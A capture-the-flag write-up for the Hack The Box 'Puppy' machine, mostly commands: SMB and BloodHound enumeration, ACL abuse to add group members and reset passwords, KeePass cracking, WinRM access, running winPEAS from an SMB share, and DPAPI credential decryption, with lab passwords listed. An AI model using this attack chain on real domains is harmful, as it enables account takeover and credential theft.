HTB Puppy
---------------------------------------
Credential Given:
username: levi.james
password: KingofAkron2025!
---------------------------------------

1. Scanning & Enumeration
nmap -sCV -T4 10.10.11.70 -v -oN nmap.txt

Domain: PUPPY.HTB
Interesting Ports:
- 53 DNS
- 88 Kerberoast
- 135 rpc
- 445/139 SMB
- 5985 winrm
- 389 ldap

SMB Enum
- smbclient -L //10.10.11.70/ -U "puppy.htb\levi.james"
- nxc smb 10.10.11.70 -u levi.james -p KingofAkron2025! --shares

READ Permissions
- IPC$
- NETLOGON
- SYSVOL

Interesting Share
- DEV (Remark: DEV-SHARE for PUPPY-DEVS)

Enum GPP Password (no result)
- nxc smb 10.10.11.70 -u levi.james -p KingofAkron2025! -M gpp_password
- nxc smb 10.10.11.70 -u levi.james -p KingofAkron2025! -M gpp_autologin

---------------------------------------
Bloodhound Enumeration
---------------------------------------
- bloodhound-python -u levi.james -p KingofAkron2025! -d puppy.htb -ns 10.10.11.70 -c All

1) levi.james
levi.james Group Membership
- DEVELOPERS (Interesting Group)
- HR
- DOMAIN USERS

levi.james Outbound Object Control
- has GenericWrite over DEVELOPERS Group (we can add member to the group)


2) ant.edwards
ant.edwards Group Membership
- DEVELOPERS
- SENIOR DEVS (Interesting Group)
- DOMAIN USERS

ant.edwards Outbound Object Control
- has GenericAll over ADAM.SILVER (we have full control over the user)

3) adam.silver (Account Disabled)
adam.silver Group Membership
- DEVELOPERS
- REMOTE MANAGEMENT (Interesting Group: we can winrm here)
- DOMAIN USERS

---------------------------------------
2. Exploiting ACE 
---------------------------------------
2.1 Add ourself (levi.james) into DEVELOPERS group to read the DEV Share
- net rpc group addmem "DEVELOPERS" "levi.james" -U "puppy.htb"/"levi.james"%"KingofAkron2025\!" -S "puppy.htb"

Verify group membership added
- net rpc group members "DEVELOPERS" -U "puppy.htb"/"levi.james"%"KingofAkron2025\!" -S "puppy.htb"

Read DEV Shares
- smbclient //10.10.11.70/DEV -U "puppy.htb\levi.james"

Found:
- recovery.kdbx

Download recovery.kdbx
- get recovery.kdbx


Bruteforce to kdbx master password with john 
- keepass2john recovery.kdbx
Error:
! recovery.kdbx : File version '40000' is currently not supported!

Keepass4brute (https://github.com/r3nt0n/keepass4brute)
- ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt (cracked password: liverpool)

Read recovery.kdbx with the cracked password
- keepassxc recovery.kdbx

New Passwords Obtained
- adam.silver:HJKL2025!
- antony.edwards:Antman2025! (Working password)
- jamie.williamson:JamieLove2025!
- samuel.blake:ILY2025!
- steve.tucker:Steve2025!

2.2 Take control over adam.silver
- net rpc password "adam.silver" "P@ssw0rd" -U "puppy.htb"/"ant.edwards"%"Antman2025\!" -S "puppy.htb"

Re-enable the adam.silver account
- bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p Antman2025! remove uac adam.silver -f ACCOUNTDISABLE

Verify user status
- nxc smb 10.10.11.70 -u adam.silver -p P@ssw0rd

2.3 WinRM as adam.silver
- evil-winrm -u adam.silver -i puppy.htb

Found:
- user.txt
- C:\Backups (Interesting Directory)
--> site-backup-2024-12-30.zip (Backup files)

Download backup zip file
- download site-backup-2024-12-30.zip

Unzip the file
- unzip site-backup-2024-12-30.zip

Found New User:
- steph.cooper:ChefSteph2025! (nms-auth-config.xml.bak)

steph.cooper Group Membership
- REMOTE MANAGEMENT (winrm)
- DOMAIN USERS

---------------------------------------
3. WinRM as steph.cooper
---------------------------------------
- evil-winrm -u steph.cooper -i puppy.htb

3.1 Run winPEASx64.exe

Host winPEAS binary with smbserver
- impacket-smbserver -smb2support share ./

Run winPEAS on target machine
- \\10.10.11.70\share\winPEASx64.exe

Found:
- C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 (DPAPI Master Key)
- C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D (Credentials File)

3.2 DPAPI Extracting Password
- impacket-dpapi masterkey -file 1038bdea-4935-41a8-a224-9b3720193c86 -sid S-1-5-21-1487982659-1829050783-2281216199-1105 -password ChefSteph2025!

Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Decrypt credential file with decrypted key
- impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84 (Nothing Found)

Find other credential file

Common Credential File Path
- C:\Users\$USER\AppData\Local\Microsoft\Credentials\
- C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\steph.cooper> Get-ChildItem -Force C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\
- C8D69EBE9A43E9DEBF6B5FBD48B521B9 (New Credential File)

Decrypt new file
- impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Found credentials:
- steph.cooper_adm:FivethChipOnItsWay2025!

3.3 Enum new user
- nxc smb 10.10.11.70 -u steph.cooper_adm -p FivethChipOnItsWay2025! (Pwn3d!)

3.4 WinRM as steph.cooper_adm
- root.txt












